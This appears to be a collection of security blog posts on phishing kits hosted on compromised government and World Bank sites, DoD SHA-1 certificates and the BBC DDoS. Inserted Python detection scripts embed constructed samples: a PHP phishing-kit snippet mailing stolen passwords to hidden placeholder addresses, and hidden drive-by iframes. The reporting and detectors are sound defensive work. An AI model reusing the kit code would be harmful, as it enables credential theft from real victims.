Brazil Gov website serving up phish and malware… again

A Brazilian government website has been compromised for the third time in less than two months. Each compromise resulted in the site hosting fraudulent content that was used in phishing attacks. One of these attacks also attempted to install drive-by malware on victims' computers.

The first compromise took place in December, when the Prefeitura Municipal de Esperança website was used to host a phishing attack against Wells Fargo bank. The fraudulent content used in this first attack was subsequently removed, but the site was compromised again last week and used to host two more phishing attacks.

The first phishing attack hosted on prefeituradeesperanca.pb.gov.br, which targeted Wells Fargo customers in December 2015.

The second phishing attack, which kicked off last week, was aimed at PayPal customers. This was arguably the most dangerous attack: As well as stealing victims' PayPal credentials and bank details, the phishing kit used in this attack also attempted to inject drive-by malware via hidden iframes.

Fraudsters often use ready-made phishing kits when deploying phishing sites, as it generally makes the process quick and easy. Kits typically consist of a collection of lookalike web pages, scripts and images which simply have to be uploaded to the compromised web server to create a ready-to-go phishing site. In most cases, all the fraudster has to do is edit a simple configuration file to tell the phishing site which email address to send the stolen credentials to.

The PayPal phishing site, which also tried to deliver malware to its victims.

The third attack – which is currently still live – uses a phishing kit that is designed to steal webmail credentials. Many slight variations of this kit exist, but all display an error message regardless of the validity of the submitted credentials.

The latest attack attempts to steal webmail credentials.

Unbeknownst to the victim, the stolen credentials are emailed to the fraudster who deployed the kit; but these webmail phishing kits also contain an additional surprise. The fraudster may not realise that the kit also sends a copy of these stolen credentials to another email address, which presumably belongs to the original author of the kit. This address has been sneakily embedded into the kit in such a way that its presence is unlikely to be spotted by the deploying fraudster.
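
As an added illustration (not code from the original article, nor from any phishing kit): a small Python triage script that pulls every recipient address out of a kit's PHP files, including addresses hidden behind base64 or assembled from string fragments, which is the kind of concealment described above. The kit files, the placeholder addresses and the two hiding tricks are constructed for the example; real kits use many other obfuscations (str_rot13, hex escapes, gzinflate), so a clean result is a starting point for manual review rather than a guarantee.

```python
import base64
import re

# Constructed sample kit: a config file holding the visible recipient and a send
# script that also mails two hidden recipients, one hidden behind base64 and one
# assembled from string fragments. All addresses are placeholders, not real ones.
SAMPLE_KIT = {
    "config.php": '<?php\n$recipient = "collector@example.com";\n',
    "send.php": (
        '<?php\ninclude "config.php";\n'
        '$msg = "User: $_POST[user]\\nPass: $_POST[pass]\\nIP: $_SERVER[REMOTE_ADDR]";\n'
        'mail($recipient, "New Login", $msg);\n'
        '$b = base64_decode("YXV0aG9yQGV4YW1wbGUubmV0");\n'
        'mail($b, "New Login", $msg);\n'
        'mail("ad" . "min" . "@" . "example" . ".org", "Copy", $msg);\n'
        'header("Location: https://mail.example/");\n'
    ),
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# PHP concatenation of two literals: "ab" . "cd"  ->  "abcd"
CONCAT_RE = re.compile(r"[\"']\s*\.\s*[\"']")


def plain_recipients(text):
    """Addresses written literally in the source."""
    return set(EMAIL_RE.findall(text))


def encoded_recipients(text):
    """Addresses that only appear after base64-decoding a literal."""
    found = set()
    for token in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: ignore
        found.update(EMAIL_RE.findall(decoded))
    return found


def split_recipients(text):
    """Addresses assembled from concatenated string fragments."""
    joined = CONCAT_RE.sub("", text)
    return set(EMAIL_RE.findall(joined)) - plain_recipients(text)


def scan_kit(files):
    """Map each file name to the recipients found by each method."""
    report = {}
    for name, text in files.items():
        report[name] = {
            "plain": plain_recipients(text),
            "encoded": encoded_recipients(text),
            "split": split_recipients(text),
        }
    return report


def hidden_recipients(files):
    """Addresses a fraudster who only edits the config file would never see."""
    report = scan_kit(files)
    visible = set().union(*(r["plain"] for r in report.values()))
    hidden = set().union(*(r["encoded"] | r["split"] for r in report.values()))
    return hidden - visible


if __name__ == "__main__":
    for name, found in scan_kit(SAMPLE_KIT).items():
        print(name, found)
    print("hidden:", sorted(hidden_recipients(SAMPLE_KIT)))
```

Run it over an unpacked kit by building the `files` mapping from the PHP files on disk; anything reported by `hidden_recipients` that does not appear in the config file is a candidate for the author's own copy.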

Webmail credentials are a popular target for phishers, as they can be used to compromise further accounts held by each victim. For example, if the victim's email address has been used to sign up for other services, the attacker might be able to use password resets to gain unauthorised access to those services.

Repeatedly compromised

The .gov.br second-level domain used by the compromised website is reserved for government entities within Brazil, yet the content of the site is physically hosted by HostGator in Texas. It is not unusual for South American governments to host websites in external countries such as the U.S., especially when the sites do not store or process any sensitive data. The most obvious motivation in this case is that hosting costs in the U.S. are typically lower than those in Brazil.

The fact that the website has been repeatedly compromised suggests there is still a vulnerability that allows remote attackers to upload arbitrary content onto the web server. One possible route of compromise could be the "unsafe" version of WordPress being used on www.prefeituradeesperanca.pb.gov.br. The Prefeitura Municipal de Esperança website uses WordPress 4.0.9 as its content management system. Although this version was released only a week ago (to address a cross-site scripting vulnerability), only the latest release series (4.4.x) is officially maintained, and the WordPress website explicitly points out that anything older than the current release (4.4.1) is not safe to use.

Another potential risk could be the site's reliance on a shared hosting platform: More than 70 other websites are served from the same IP address as that used by www.prefeituradeesperanca.pb.gov.br. Vulnerabilities exposed by any of these non-government sites could potentially be used to attack the government site. Also, in general, any web server that has previously been compromised could have had a backdoor installed by the attacker, making it trivial to gain unauthorised access at a later time.

The PayPal phishing kit

PayPal is one of the most common phishing targets, with many distinct phishing kits making it easy for even novices to carry out these types of attack. Last month alone, Netcraft blocked more than 60,000 phishing URLs that were designed to steal PayPal credentials.

The PayPal phishing kit used in last week's attack featured a few tricks that made it stand out from a typical kit. Although it exhibits a few tell-tale spelling mistakes, the designer of the phishing kit has been very careful in other respects. For example, the initial login page actually consists of a large background image, with two input fields and a submit button overlaid. This means the textual content of the page does not need to be written in the HTML document, which could in turn reduce the likelihood of the attack being spotted and blocked by certain internet security software.

However, this trick does not work too well in all browsers – if you look closely, you can see that the text fields do not quite line up with the placeholders in the background image:

Misaligned login form, with "Payement" spelling mistake.

The fact that the spelling mistakes are contained within images, rather than within an easily editable HTML document, could explain why subsequent users of this phishing kit have not corrected them.

Spelling mistakes aside, the developer has also implemented validation checks to prevent the login form being submitted with an invalid email address.

After stealing the victim's PayPal credentials, the phishing site takes the user through a three-stage "update" process. The first stage collects the victim's full address and date of birth, the second gathers payment card details, and the final stage steals bank account numbers.

Each stage of the phishing attack validates the information entered by the victim.

Each page validates the victim's input, and like the spoof login page, they also use background images in an attempt to evade detection.

But the nastiest feature is that each page in the phishing kit contains a set of hidden iframes that attempt to silently install malware on the victim's computer. This is a relatively unusual feature for a phishing kit, and was possibly included to the benefit of the phishing kit's author, rather than to the subordinate fraudsters who deploy it.

The PayPal attack also attempted to inject drive-by malware via iframes. This component of the attack did not work, as the domain used for the malware delivery has been sinkholed.

However, the malware component of the attack does not work, as the domain used for the malware delivery has been sinkholed. If it had not already been sinkholed and was still serving drive-by malware, any victim visiting the phishing site could have had his computer compromised as soon as the login page was viewed. If the victim was cautious enough to not submit the login form, the malware might still have allowed the attacker to steal the victim's credentials in other ways, or allow for other monetization opportunities, such as making the victim's computer part of a botnet.
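
An added example, not from the original article: a Python check for iframes that a user would never see, the hallmark of the drive-by injection described above. The sample page, the iframe hosts (on the reserved .invalid TLD) and the hiding rules are constructed for the example. Zero or one-pixel sizes, display:none, visibility:hidden, opacity:0 and absolute positioning far off-screen are the patterns it checks; a kit can also inject a frame from JavaScript at run time, so this is a triage aid for a saved page, not proof of absence.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: a spoof login form plus four iframes, three hidden in
# the ways drive-by kits use and one legitimately visible. Hosts are placeholders
# on the reserved .invalid TLD, not the domain from the attack.
SAMPLE_PAGE = """
<html><body style="background:url(login.jpg)">
<form action="login.php" method="post">
  <input name="email"><input name="pass" type="password"><input type="submit">
</form>
<iframe src="http://sinkholed-host.invalid/gate.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://sinkholed-host.invalid/ld.php" style="display:none"></iframe>
<iframe src="http://sinkholed-host.invalid/x.php"
        style="position:absolute; left:-9999px; top:-9999px; width:1px; height:1px"></iframe>
<iframe src="https://www.example.com/help" width="600" height="400"></iframe>
</body></html>
"""

NUMBER_RE = re.compile(r"-?\d+")


def parse_style(style):
    """'a: b; c: d' -> {'a': 'b', 'c': 'd'} with keys and values lowercased."""
    rules = {}
    for part in style.split(";"):
        if ":" in part:
            key, value = part.split(":", 1)
            rules[key.strip().lower()] = value.strip().lower()
    return rules


def as_int(value):
    """First integer in an HTML/CSS size value ('1px' -> 1), or None."""
    m = NUMBER_RE.search(value or "")
    return int(m.group()) if m else None


def hiding_reasons(attrs):
    """List the reasons an iframe with these (name, value) attributes is invisible."""
    attrs = {k.lower(): (v or "") for k, v in attrs}
    style = parse_style(attrs.get("style", ""))
    reasons = []
    if "hidden" in attrs:
        reasons.append("hidden attribute")
    if style.get("display") == "none":
        reasons.append("display:none")
    if style.get("visibility") == "hidden":
        reasons.append("visibility:hidden")
    if style.get("opacity") in ("0", "0.0"):
        reasons.append("opacity:0")
    for dim in ("width", "height"):            # CSS wins over the HTML attribute
        size = as_int(style.get(dim, attrs.get(dim)))
        if size is not None and size <= 1:
            reasons.append(f"{dim}<=1")
    if style.get("position") in ("absolute", "fixed"):
        for edge in ("left", "top"):
            offset = as_int(style.get(edge))
            if offset is not None and offset < -100:
                reasons.append(f"{edge} off-screen")
    return reasons


class IframeCollector(HTMLParser):
    """Collect the attribute list of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(attrs)


def find_hidden_iframes(html):
    """Return [{'src': ..., 'reasons': [...]}] for every iframe a user would not see."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        reasons = hiding_reasons(attrs)
        if reasons:
            hits.append({"src": dict(attrs).get("src", ""), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

Every src reported by `find_hidden_iframes` is a host to look up against sinkhole and blocklist data before anyone opens the page in a real browser.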

After the victim has submitted his bank account details, the PayPal phishing site indicates that the account has been successfully updated, and redirects the victim to the genuine PayPal login page. Being prompted to enter a username and password a second time could ring alarm bells, as the victim has, ostensibly, already logged in. The phishing site explains away this concern by saying the user must re-login to save the changes.

All three of these phishing attacks were added to Netcraft's Phishing Site Feed. This feed is used by all major web browsers and many leading anti-virus and content-filtering companies, so most users are already protected against the latest webmail phishing attack. The fraudulent content used in the first two attacks has been removed from the Prefeitura Municipal de Esperança website.

US military still SHAckled to outdated DoD PKI infrastructure

Despite widespread concerns over the security of the SHA-1 hash algorithm, the US Department of Defense is still issuing SHA-1 signed certificates, and using them to secure connections to .mil websites.

The US DoD issued a SHA-1 signed certificate to necportal.riley.army.mil on 4 January 2016

Since 1 January 2016, the CA/Browser Forum's Baseline Requirements [pdf] have banned the issuance of new SHA-1 certificates. Publicly-trusted certificate authorities are expected to comply with these Baseline Requirements in order to remain trusted by browsers and operating systems.

However, the US DoD is not a publicly-trusted certificate authority per se, and therefore it does not have to abide by the CA/Browser Forum's rules. With the exception of Apple platforms, most browser software does not include the DoD's root certificates by default. This means any secure site that uses a certificate issued by the DoD is unlikely to be trusted by a browser running on Windows or Linux, unless the user has explicitly installed the DoD's root certificates.

Even though the DoD does not have to abide by the CA/Browser Forum's rules, it is arguably a bad idea not to: the SHA-1 algorithm is now thought to be sufficiently weak that a well-funded attacker might be able to find a SHA-1 collision and, against a CA that is still signing SHA-1 certificates, turn it into a certificate that lets it impersonate an HTTPS website. It is also particularly surprising to see the DoD still using SHA-1 today when the US National Institute of Standards and Technology disallowed its use for generating digital signatures more than two years ago. Since NIST made this decision, the cost projections of finding a SHA-1 hash collision have reduced significantly.

On 4 January 2016, the DoD issued a SHA-1 certificate to necportal.riley.army.mil [site report], which is a SharePoint portal hosted by the United States Army Information Systems Command. It can be accessed remotely by Common Access Card (CAC) holders. The certificate is marked as being valid until 8 September 2017.
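
An added example, not code from the original article: a dependency-free Python reader that pulls the signature algorithm out of a certificate's outer signatureAlgorithm field, which is the field browsers consult when deciding whether a certificate is SHA-1 signed. The sample certificates are constructed inside the block (a valid outer DER layout around a placeholder tbsCertificate) so it runs offline; point it at a real DER or PEM file, for instance one saved from `openssl s_client -showcerts`, to check a live site. It does not verify the signature or walk the chain, and the chain matters: a SHA-256 leaf under a SHA-1 intermediate is still SHA-1 dependent.

```python
import base64

# Dotted OIDs for the signature algorithms most often seen in X.509 certificates.
SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
    "1.2.840.10045.4.3.3": "ecdsa-with-SHA384",
    "1.2.840.10045.4.3.4": "ecdsa-with-SHA512",
}
WEAK_HASHES = ("md2", "md5", "sha1")


def read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits = byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    """OID content bytes -> dotted form (2a864886f70d010105 -> 1.2.840.113549.1.1.5)."""
    arcs = [body[0] // 40, body[0] % 40]
    value = 0
    for b in body[1:]:                     # base-128, high bit = more bytes follow
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def load_certificate(data):
    """Accept DER bytes or a PEM block and return DER bytes."""
    if data.lstrip().startswith(b"-----BEGIN"):
        body = b"".join(l for l in data.splitlines() if not l.startswith(b"-----"))
        return base64.b64decode(body)
    return data


def signature_algorithm(data):
    """Name (or dotted OID) of the algorithm in the outer signatureAlgorithm field."""
    tag, cert, _ = read_tlv(load_certificate(data), 0)   # Certificate ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _, pos = read_tlv(cert, 0)                        # tbsCertificate, skipped whole
    _, alg, _ = read_tlv(cert, pos)                      # AlgorithmIdentifier ::= SEQUENCE
    tag, oid_body, _ = read_tlv(alg, 0)                  # its first element is the OID
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    oid = decode_oid(oid_body)
    return SIGNATURE_OIDS.get(oid, oid)


def is_weak(algorithm_name):
    return any(h in algorithm_name.lower() for h in WEAK_HASHES)


# --- constructed samples (placeholders, not real certificates) -----------------
def der(tag, body):
    """Encode one TLV, using long-form length where DER requires it."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def to_pem(der_bytes):
    """Wrap DER bytes the way openssl s_client -showcerts prints them."""
    return (b"-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(der_bytes)
            + b"-----END CERTIFICATE-----\n")


def sample_certificate(oid_content):
    """Valid outer Certificate layout; the tbsCertificate is a padded placeholder
    (over 128 bytes, so the long-form length path gets exercised)."""
    tbs = der(0x30, der(0x02, b"\x01") + der(0x04, b"\x00" * 200))
    alg = der(0x30, der(0x06, oid_content) + der(0x05, b""))
    sig = der(0x03, b"\x00" * 33)          # BIT STRING: unused-bits byte + dummy bytes
    return der(0x30, tbs + alg + sig)


SAMPLE_SHA1_CERT = sample_certificate(bytes.fromhex("2a864886f70d010105"))
SAMPLE_SHA256_CERT = sample_certificate(bytes.fromhex("2a864886f70d01010b"))

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_SHA1_CERT
    name = signature_algorithm(data)
    print(name, "(WEAK)" if is_weak(name) else "(ok)")
```

Run it on each certificate in the chain except the self-signed root (whose signature browsers do not check), and treat any result that `is_weak` flags as one the browser deadlines discussed below will bite.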

The DoD is America's largest government agency, and is tasked with protecting the security of its country, which makes its continued reliance on SHA-1 particularly remarkable. Besides the well known security implications, this reliance could already prove problematic amongst the DoD's millions of employees. For instance, Mozilla Firefox 43 began rejecting all new SHA-1 certificates issued since 1 January 2016. When it encountered one of these certificates, the browser displayed an Untrusted Connection error, although this could be overridden. If DoD employees become accustomed to ignoring such errors, it could become much easier to carry out man-in-the-middle attacks against them.

However, the latest version of Firefox no longer rejects SHA-1 certificates issued after 1 January 2016. This change was made to cater for users of certain man-in-the-middle products, which generate freshly issued certificates on the fly. Consequently, users of Firefox 43.0.4 who have installed the appropriate DoD root certificates will currently not receive any errors, or even warnings, when browsing to the site.

Google intends to block all SHA-1 certificates issued from 1 January 2016 with the release of Chrome 48. In the meantime, Chrome 47 affirmatively distrusts the SHA-1 certificate used by necportal.riley.army.mil because it does not expire until 2017.

Chrome regards the certificate as affirmatively insecure, even when the appropriate DoD root certificates are installed.

Firefox will ultimately distrust all SHA-1 certificates by 2017, regardless of when they were issued, but Mozilla considered advancing this deadline to as early as 1 July 2016 when the new cost projections were realised.

More than 650,000 SSL certificates in use on the web are still using SHA-1, but this count has been rapidly falling since 2014. Nearly all of these certificates are due to expire by the end of 2016, in accordance with the Baseline Requirements; however, with most browser vendors contemplating an accelerated deprecation timeline, it is likely that many of these certificates will be replaced before the middle of the year.

With the US DoD PKI infrastructure seemingly still reliant on SHA-1, by the end of 2017, the DoD could account for a significant proportion of all SHA-1 certificates that are intended to be used by modern browsers.

BBC websites back to normal, DDoS mitigation reverted

The BBC's websites are now back to normal, four days after being taken down by an effective DDoS attack on New Year's Eve.

The BBC mitigated the attack within a few hours by moving its main website onto the Akamai content delivery network, which restored access to its millions of users. However, during this mitigation period, some of the BBC's other websites – which were still hosted at the BBC – remained mostly unreachable.

The BBC's DDoS mitigation was only temporary, and last night it moved its main website off Akamai, back onto a netblock owned by the BBC. This move resulted in another short outage on 4th January, followed by several hours of slightly slower response times within the UK. By the 5th January, the response times had settled down to be almost comparable with when it was using Akamai.

The main BBC website experienced another short outage last night as it moved off the Akamai CDN.

However, as expected, response times from other countries are no longer as fast as they were when the BBC's main website was hosted on the Akamai CDN. Response times from the US are notably slower, but currently no worse than they were before the DDoS attacks on New Year's Eve.

Response times from the US are now much slower again (although international visitors would typically visit bbc.com rather than bbc.co.uk).

During the period in which the BBC's main website was hosted on the Akamai CDN, its legacy News website at news.bbc.co.uk remained hosted at the BBC. This was mostly unavailable during this period, with most client connection attempts being reset.

news.bbc.co.uk is now functioning normally, too.

This site's availability was restored to normal at the same time that the main BBC website moved off Akamai. This suggests that the connection resets were a deliberate attempt to mitigate basic DDoS attacks, rather than a direct side effect of a sustained DDoS attack. However, this approach was not ideal – while some browsers (such as Chrome) would automatically retry the connection attempt (often successfully), other browsers would give up at the first failure.

BBC websites still suffering after DDoS attack

Since suffering a crippling DDoS attack on New Year's Eve, some BBC websites are still experiencing significant performance issues.

Around 07:00 UTC on 31 December 2015, the main BBC website at www.bbc.co.uk was knocked offline after being subjected to a distributed denial of service attack. For the following few hours, requests to the BBC website either eventually timed out, or were responded to with its 500 Internal Error test card page. A group called New World Hacking later claimed responsibility for the attack, which it carried out as a test of its capabilities.

Requests that did not time out were eventually met with the BBC test card error page.

The British Broadcasting Corporation is the public service broadcaster of the United Kingdom, and the outage had a significant impact on its user base: The BBC's news, sport, weather and iPlayer TV and radio catchup services are all delivered via www.bbc.co.uk.

Performance chart for www.bbc.co.uk, showing the primary outage period.

At the time of the attack, www.bbc.co.uk was served from a netblock owned by the BBC. It seems that service was restored by migrating the site onto the Akamai content delivery network, after which there were no apparent outages.

OS     Server  Last seen    IP address      Netblock Owner
Linux  nginx   3-Jan-2016   88.221.48.170   Akamai
Linux  nginx   2-Jan-2016   95.101.129.88   Akamai Technologies
Linux  nginx   31-Dec-2015  95.101.129.106  Akamai Technologies
Linux  nginx   30-Dec-2015  212.58.244.70   BBC
Linux  nginx   29-Dec-2015  212.58.246.54   BBC
Linux  nginx   28-Dec-2015  212.58.244.71   BBC

Moving www.bbc.co.uk onto the Akamai CDN also resulted in some significant performance benefits, particularly from locations outside of the UK. For example, prior to the attack, most requests from Netcraft's New York performance collector took around 0.4-0.6 seconds to receive a response, whereas after the site had migrated to Akamai, all requests were served in well under 0.1 seconds. These performance benefits are typical when using a globally distributed CDN, as cached content can be delivered from an edge server within the client's own country, rather than from a remote server that can only be reached via transatlantic cables.

Performance chart for www.bbc.co.uk from New York, highlighting the improved response times and successful attack mitigation after switching to Akamai.

However, not all of the BBC's websites have migrated to Akamai, and some of these are still exhibiting connectivity issues in the aftermath of the attack. For example, search.bbc.co.uk and news.bbc.co.uk are still hosted directly at the BBC, and these are still experiencing problems today.

The BBC's News service is currently found at www.bbc.co.uk/news, but up until a few years ago it used to be served from its own dedicated hostname, news.bbc.co.uk. This legacy hostname is still used by some webpages today, but mostly redirects visitors to the new site at www.bbc.co.uk/news. This conveniently collates all of the BBC's main online services under the same hostname, but at the expense of introducing a single point of failure. If each service were still to be found under a different hostname and on different servers, it might have offered further resilience to the initial attack.

The performance chart for news.bbc.co.uk shows massive outages long after the DDoS attack on New Year's Eve.

As shown above, news.bbc.co.uk was also affected by the DDoS attack which took down the main BBC website, but eventually came back online later that day without having to relocate the website. However, the following morning (New Year's Day), it started to experience significant connectivity problems.

Most requests to news.bbc.co.uk are still failing. Some browsers, such as Chrome, may automatically retry the request.

It is unclear whether this indicates a separate ongoing attack, or an attempt at mitigating such attacks, but nonetheless, it is likely to affect lots of users: Many old news articles are still served directly from news.bbc.co.uk, and some users habitually reach the news website by typing news.bbc.co.uk into their browsers. Some regularly updated pages also continue to be served from news.bbc.co.uk, such as horse racing results.

World Bank hacked by PayPal phishers

Hackers have broken into a website operated by the World Bank Group, which was subsequently exploited to host a convincing PayPal phishing site. The fraudulent content deployed on the site was able to benefit from the presence of a valid Extended Validation SSL certificate.

Extended Validation certificates can only be issued to organisations that have gone through a stringent set of verification steps, as required by the CA/Browser Forum. To recognise the high level of assurance offered by an EV certificate, most browser software will display the organisation's name in a prominent green box next to the address bar.

A PayPal phishing site, using an Extended Validation SSL certificate issued to the World Bank Group.

The EV vetting process effectively guarantees that the domain used in this attack is operated by the organisation specified in the certificate, which in this case is the World Bank Group. By implication, any visitor to this site is likely to trust the content it displays.

But of course, this guarantee goes out the window if the site has been compromised by an attacker. That's exactly what happened on Tuesday, when fraudsters deployed a PayPal phishing site into a directory on climatesmartplanning.org, allowing the fraudulent content to be served with an EV certificate issued to The World Bank Group.

The Climate-Smart Planning Platform is an initiative led by The World Bank, which makes it easier for developing-country practitioners to locate and access the tools, data and knowledge they need for climate-smart planning. Given its noble goals, it seems a shame that its website has been affected by this fraudulent activity.

The day after the attack, the website became temporarily unavailable (displaying only a Red Hat Enterprise Linux test page), before later coming back online with the fraudulent content removed. But today, it became evident that the site is still vulnerable to attack, as its homepage has now been defaced by a group called "Virus iraq".

A World Bank Group website hacked by "Virus iraq" (19 November, 2015).

This is not the only time The World Bank's reputation has been tainted by the work of fraudsters – its name is also often used in 419 scams.

Tuesday's phishing attack started off by asking the victim to enter his or her PayPal email address and password. These credentials were submitted to a logcheck.php script on the server, which carried out some validation to prevent bogus data clogging up the phisher's haul.

The phishing site rejects invalid email addresses.

After logging these stolen credentials, the phishing site claims it is temporarily unable to load the user's account. The victim is prompted to confirm their "informations" in order to access their account.

The next page asks for several details that would help the fraudster carry out identity theft. These details include the victim's name, date of birth, address and phone number. After these have been submitted, the victim is prompted to confirm payment card details by entering his full card number, expiry date and CSC (CVV) number.

The previous page also has a checkbox to specify whether or not the victim's card uses Verified by Visa or MasterCard SecureCode. If this box is checked, the next page will prompt the user to enter his 3-D Secure password, thus allowing the attacker to make fraudulent purchases on sites that are protected by these additional layers of security.

Stealing the victim's 3-D Secure password.

After this final password has been stolen, the victim is redirected to the genuine PayPal website, leaving the attacker with the ability to make fraudulent purchases using either the victim's PayPal account or credit card.

At the time of writing, the Climate-Smart Planning Platform website remains defaced, but the phishing content has been removed.

Nigerian government serving up fresh phish

The Financial Reporting Council of Nigeria is currently serving a webmail phishing site from its own government domain.

The phishing content is based on a ready-to-go phishing kit that is distributed as a zip file. It contains easily-customisable PHP scripts and images designed to trick victims into surrendering either their Yahoo, Gmail, Hotmail or AOL passwords.

Gmail phishing content served from a Nigerian government website.

In this case, the kit has been deployed within an images directory on a Nigerian government website at financialreportingcouncil.gov.ng, which suggests that the site may have been compromised by a remote attacker. The same phishing kit has also been used to deploy phishing sites on several other websites over the past nine months.

After a victim enters his or her email credentials into the phishing site, both the username and password are transmitted via email directly to the fraudster. These emails also contain the victim's IP address, and a third-party web service is used to deduce which country the victim is in.

After stealing the victim's email credentials, the phishing site inexplicably redirects the browser to the Saatchi Art investment website at http://explore.saatchiart.com/invest-in-art/. This does not appear to be in any way connected to the fraudulent activity.

One of the PHP scripts found within the phishing kit.

Unlike conventional phishing attacks against banks, attacks that aim to harvest email credentials typically have no immediate financial return; but access to a single victim's email account can often facilitate unauthorised access to several other accounts. With minimal effort, the fraudster can easily discover which websites the victim uses, and then submit password reset requests to those websites. As a bonus, the compromised email account can also be abused to send phishing emails to additional victims, as well as providing a source of valid email addresses.

The majority of Nigeria's government websites, including the one operated by the Financial Reporting Council, are hosted in the United States. It is not apparent how the phishing content has ended up on financialreportingcouncil.gov.ng, although one possible route of compromise could be the unsupported Joomla! CMS software installed on the server. It is still using Joomla! 2.5.28, which reached End of Life status at the end of 2014, meaning that it no longer receives security updates or bug fixes.

However, the Joomla! Security Centre does not document any publicly-known vulnerabilities that affect version 2.5.28. Nonetheless, the use of unsupported software on a public-facing website often catches the attention of hackers, as it is generally indicative of poor security practices elsewhere, and thus attracts further scrutiny. Unless the server was compromised via an undocumented 0-day vulnerability in Joomla!, it may well have been compromised via a different route.